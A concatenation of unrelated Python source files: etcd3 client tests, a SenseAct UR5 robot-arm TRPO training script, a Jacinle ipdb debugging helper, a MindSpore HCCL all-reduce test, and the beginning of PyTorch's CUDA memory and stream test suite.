'ascend': etcdrpc.RangeRequest.ASCEND,
'descend': etcdrpc.RangeRequest.DESCEND,
}
for input, expected in sort_target.items():
range_request = etcd._build_get_range_request(key,
sort_order=input)
assert range_request.sort_order == expected
with pytest.raises(ValueError):
etcd._build_get_range_request(key, sort_order='feelsbadman')
def test_secure_channel(self):
client = etcd3.client(
ca_cert="tests/ca.crt",
cert_key="tests/client.key",
cert_cert="tests/client.crt"
)
assert client.uses_secure_channel is True
def test_secure_channel_ca_cert_only(self):
client = etcd3.client(
ca_cert="tests/ca.crt",
cert_key=None,
cert_cert=None
)
assert client.uses_secure_channel is True
def test_secure_channel_ca_cert_and_key_raise_exception(self):
with pytest.raises(ValueError):
etcd3.client(
ca_cert='tests/ca.crt',
cert_key='tests/client.crt',
cert_cert=None)
with pytest.raises(ValueError):
etcd3.client(
ca_cert='tests/ca.crt',
cert_key=None,
cert_cert='tests/client.crt')
def test_compact(self, etcd):
etcd.compact(3)
with pytest.raises(grpc.RpcError):
etcd.compact(3)
def test_channel_with_no_cert(self):
client = etcd3.client(
ca_cert=None,
cert_key=None,
cert_cert=None
)
assert client.uses_secure_channel is False
@mock.patch('etcdrpc.AuthStub')
def test_user_pwd_auth(self, auth_mock):
auth_resp_mock = mock.MagicMock()
auth_resp_mock.token = 'foo'
auth_mock.Authenticate = auth_resp_mock
self._enable_auth_in_etcd()
# Create a client using username and password auth
client = etcd3.client(
user='root',
password='pwd'
)
assert client.call_credentials is not None
self._disable_auth_in_etcd()
def test_user_or_pwd_auth_raises_exception(self):
with pytest.raises(Exception):
etcd3.client(user='usr')
with pytest.raises(Exception):
etcd3.client(password='pwd')
def _enable_auth_in_etcd(self):
subprocess.call(['etcdctl', '-w', 'json', 'user', 'add', 'root:pwd'])
subprocess.call(['etcdctl', 'auth', 'enable'])
def _disable_auth_in_etcd(self):
subprocess.call(['etcdctl', 'user', 'remove', 'root'])
subprocess.call(['etcdctl', '-u', 'root:pwd', 'auth', 'disable'])
class TestCompares(object):
def test_compare_version(self):
key = 'key'
tx = etcd3.Transactions()
version_compare = tx.version(key) == 1
assert version_compare.op == etcdrpc.Compare.EQUAL
version_compare = tx.version(key) != 2
assert version_compare.op == etcdrpc.Compare.NOT_EQUAL
version_compare = tx.version(key) < 91
assert version_compare.op == etcdrpc.Compare.LESS
version_compare = tx.version(key) > 92
assert version_compare.op == etcdrpc.Compare.GREATER
assert version_compare.build_message().target == \
etcdrpc.Compare.VERSION
def test_compare_value(self):
key = 'key'
tx = etcd3.Transactions()
value_compare = tx.value(key) == 'b'
assert value_compare.op == etcdrpc.Compare.EQUAL
value_compare = tx.value(key) != 'b'
assert value_compare.op == etcdrpc.Compare.NOT_EQUAL
value_compare = tx.value(key) < 'b'
assert value_compare.op == etcdrpc.Compare.LESS
value_compare = tx.value(key) > 'b'
assert value_compare.op == etcdrpc.Compare.GREATER
assert value_compare.build_message().target == etcdrpc.Compare.VALUE
def test_compare_mod(self):
key = 'key'
tx = etcd3.Transactions()
mod_compare = tx.mod(key) == -100
assert mod_compare.op == etcdrpc.Compare.EQUAL
mod_compare = tx.mod(key) != -100
assert mod_compare.op == etcdrpc.Compare.NOT_EQUAL
mod_compare = tx.mod(key) < 19
assert mod_compare.op == etcdrpc.Compare.LESS
mod_compare = tx.mod(key) > 21
assert mod_compare.op == etcdrpc.Compare.GREATER
assert mod_compare.build_message().target == etcdrpc.Compare.MOD
def test_compare_create(self):
key = 'key'
tx = etcd3.Transactions()
create_compare = tx.create(key) == 10
assert create_compare.op == etcdrpc.Compare.EQUAL
create_compare = tx.create(key) != 10
assert create_compare.op == etcdrpc.Compare.NOT_EQUAL
create_compare = tx.create(key) < 155
assert create_compare.op == etcdrpc.Compare.LESS
create_compare = tx.create(key) > -12
assert create_compare.op == etcdrpc.Compare.GREATER
assert create_compare.build_message().target == etcdrpc.Compare.CREATE
|
ur5_reacher_6D.py
|
#!/usr/bin/env python
# Copyright (c) 2018, The SenseAct Authors.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import copy
import time
from multiprocessing import Process, Value, Manager
import baselines.common.tf_util as U
import numpy as np
from baselines.ppo1.mlp_policy import MlpPolicy
from baselines.trpo_mpi.trpo_mpi import learn
from helper import create_callback
from senseact.envs.ur.reacher_env import ReacherEnv
from senseact.utils import tf_set_seeds, NormalizedEnv
def main(ip):
# use fixed random state
rand_state = np.random.RandomState(1).get_state()
np.random.set_state(rand_state)
tf_set_seeds(np.random.randint(1, 2**31 - 1))
# Create UR5 Reacher2D environment
env = ReacherEnv(
setup="UR5_6dof",
host=ip,
dof=6,
control_type="velocity",
target_type="position",
reset_type="zero",
reward_type="precision",
derivative_type="none",
deriv_action_max=5,
first_deriv_max=2,
accel_max=1.4,
speed_max=0.3,
speedj_a=1.4,
episode_length_time=4.0,
episode_length_step=None,
actuation_sync_period=1,
dt=0.04,
run_mode="multiprocess",
rllab_box=False,
movej_t=2.0,
delay=0.0,
random_state=rand_state
)
env = NormalizedEnv(env)
# Start environment processes
env.start()
# Create baselines TRPO policy function
sess = U.single_threaded_session()
sess.__enter__()
def policy_fn(name, ob_space, ac_space):
return MlpPolicy(name=name, ob_space=ob_space, ac_space=ac_space,
hid_size=64, num_hid_layers=2)
# Create and start plotting process
plot_running = Value('i', 1)
shared_returns = Manager().dict({"write_lock": False,
"episodic_returns": [],
"episodic_lengths": [], })
# Spawn plotting process
pp = Process(target=plot_ur5_reacher, args=(env, 2048, shared_returns, plot_running))
pp.start()
# Create callback function for logging data from baselines TRPO learn
kindred_callback = create_callback(shared_returns)
# Train baselines TRPO
learn(env, policy_fn,
max_timesteps=200000,
timesteps_per_batch=2048,
max_kl=0.05,
cg_iters=10,
cg_damping=0.1,
vf_iters=5,
vf_stepsize=0.001,
gamma=0.995,
lam=0.995,
callback=kindred_callback
)
# Safely terminate plotter process
plot_running.value = 0 # shutdown ploting process
time.sleep(2)
pp.join()
env.close()
def plot_ur5_reacher(env, batch_size, shared_returns, plot_running):
"""Helper process for visualize the tasks and episodic returns.
Args:
env: An instance of ReacherEnv
batch_size: An int representing timesteps_per_batch provided to the PPO learn function
shared_returns: A manager dictionary object containing `episodic returns` and `episodic lengths`
plot_running: A multiprocessing Value object containing 0/1.
1: Continue plotting, 0: Terminate plotting loop
"""
print ("Started plotting routine")
import matplotlib.pyplot as plt
plt.ion()
time.sleep(5.0)
fig = plt.figure(figsize=(20, 6))
ax1 = fig.add_subplot(131)
hl1, = ax1.plot([], [], markersize=10, marker="o", color='r')
hl2, = ax1.plot([], [], markersize=10, marker="o", color='b')
ax1.set_xlabel("X", fontsize=14)
h = ax1.set_ylabel("Y", fontsize=14)
h.set_rotation(0)
ax3 = fig.add_subplot(132)
hl3, = ax3.plot([], [], markersize=10, marker="o", color='r')
hl4, = ax3.plot([], [], markersize=10, marker="o", color='b')
ax3.set_xlabel("Z", fontsize=14)
h = ax3.set_ylabel("Y", fontsize=14)
h.set_rotation(0)
ax2 = fig.add_subplot(133)
hl11, = ax2.plot([], [])
count = 0
old_size = len(shared_returns['episodic_returns'])
while plot_running.value:
plt.suptitle("Reward: {:.2f}".format(env._reward_.value), x=0.375, fontsize=14)
hl1.set_ydata([env._x_target_[1]])
hl1.set_xdata([env._x_target_[2]])
hl2.set_ydata([env._x_[1]])
hl2.set_xdata([env._x_[2]])
ax1.set_ylim([env._end_effector_low[1], env._end_effector_high[1]])
ax1.set_xlim([env._end_effector_low[2], env._end_effector_high[2]])
ax1.set_title("X-Y plane", fontsize=14)
ax1.set_xlim(ax1.get_xlim()[::-1])
ax1.set_ylim(ax1.get_ylim()[::-1])
hl3.set_ydata([env._x_target_[1]])
hl3.set_xdata([env._x_target_[0]])
hl4.set_ydata([env._x_[1]])
hl4.set_xdata([env._x_[0]])
ax3.set_ylim([env._end_effector_low[1], env._end_effector_high[1]])
ax3.set_xlim([env._end_effector_low[0], env._end_effector_high[0]])
ax3.set_title("Y-Z plane", fontsize=14)
ax3.set_xlim(ax3.get_xlim()[::-1])
ax3.set_ylim(ax3.get_ylim()[::-1])
# make a copy of the whole dict to avoid episode_returns and episodic_lengths getting desync
# while plotting
copied_returns = copy.deepcopy(shared_returns)
if not copied_returns['write_lock'] and len(copied_returns['episodic_returns']) > old_size:
# plot learning curve
returns = np.array(copied_returns['episodic_returns'])
old_size = len(copied_returns['episodic_returns'])
window_size_steps = 5000
x_tick = 1000
if copied_returns['episodic_lengths']:
ep_lens = np.array(copied_returns['episodic_lengths'])
else:
ep_lens = batch_size * np.arange(len(returns))
cum_episode_lengths = np.cumsum(ep_lens)
if cum_episode_lengths[-1] >= x_tick:
steps_show = np.arange(x_tick, cum_episode_lengths[-1] + 1, x_tick)
rets = []
for i in range(len(steps_show)):
rets_in_window = returns[(cum_episode_lengths > max(0, x_tick * (i + 1) - window_size_steps)) *
(cum_episode_lengths < x_tick * (i + 1))]
if rets_in_window.any():
rets.append(np.mean(rets_in_window))
hl11.set_xdata(np.arange(1, len(rets) + 1) * x_tick)
ax2.set_xlim([x_tick, len(rets) * x_tick])
hl11.set_ydata(rets)
ax2.set_ylim([np.min(rets), np.max(rets) + 50])
time.sleep(0.01)
fig.canvas.draw()
fig.canvas.flush_events()
count += 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--ip", default=None, help="IP address of the UR5")
args = parser.parse_args()
main(**args.__dict__)
|
debug.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : debug.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 08/26/2019
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
import sys
import functools
import threading
import contextlib
__all__ = ['hook_exception_ipdb', 'unhook_exception_ipdb', 'exception_hook']
def _custom_exception_hook(type, value, tb):
if hasattr(sys, 'ps1') or not sys.stderr.isatty():
# we are in interactive mode or we don't have a tty-like
# device, so we call the default hook
sys.__excepthook__(type, value, tb)
else:
import traceback, ipdb
# we are NOT in interactive mode, print the exception...
traceback.print_exception(type, value, tb)
# ...then start the debugger in post-mortem mode.
ipdb.post_mortem(tb)
def hook_exception_ipdb():
if not hasattr(_custom_exception_hook, 'origin_hook'):
_custom_exception_hook.origin_hook = sys.excepthook
sys.excepthook = _custom_exception_hook
def unhook_exception_ipdb():
assert hasattr(_custom_exception_hook, 'origin_hook')
sys.excepthook = _custom_exception_hook.origin_hook
@contextlib.contextmanager
def exception_hook(enable=True):
if enable:
hook_exception_ipdb()
yield
unhook_exception_ipdb()
else:
yield
def decorate_exception_hook(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
with exception_hook():
return func(*args, **kwargs)
return wrapped
def _TimeoutEnterIpdbThread(locals_, cv, timeout):
with cv:
if not cv.wait(timeout):
import ipdb; ipdb.set_trace()
@contextlib.contextmanager
def timeout_ipdb(locals_, timeout=3):
cv = threading.Condition()
thread = threading.Thread(target=_TimeoutEnterIpdbThread, args=(locals_, cv, timeout))
thread.start()
yield
with cv:
cv.notify_all()
|
test_pynative_hccl.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test bert thor performance with 8p on mlperf dataset"""
import os
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore import dtype as mstype
from mindspore.ops import operations as P
import mindspore.communication.management as D
from mindspore import context
from mindspore.context import ParallelMode
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
np.random.seed(1)
os.environ['GLOG_v'] = str(2)
class AllReduceNet(nn.Cell):
def __init__(self):
super(AllReduceNet, self).__init__()
self.all_reduce = P.AllReduce()
def construct(self, x):
return self.all_reduce(x)
def train_allreduce_8p(q, device_id, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend", device_id=device_id)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,
device_num=device_num)
net = AllReduceNet()
input_x = np.ones([32, 255, 255, 3]).astype(np.float32)
except_output = input_x * 8
output = net(Tensor(input_x, mstype.float32))
q.put(np.allclose(output.asnumpy(), except_output))
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_pynative_hccl_8p():
device_num = 8
process = []
q = Queue()
for i in range(device_num):
device_id = i
process.append(Process(target=train_allreduce_8p, args=(q, device_id, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
# check result
for i in range(device_num):
assert q.get()
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
|
test_cuda.py
|
# Owner(s): ["module: cuda"]
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \
get_cycles_per_ms
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
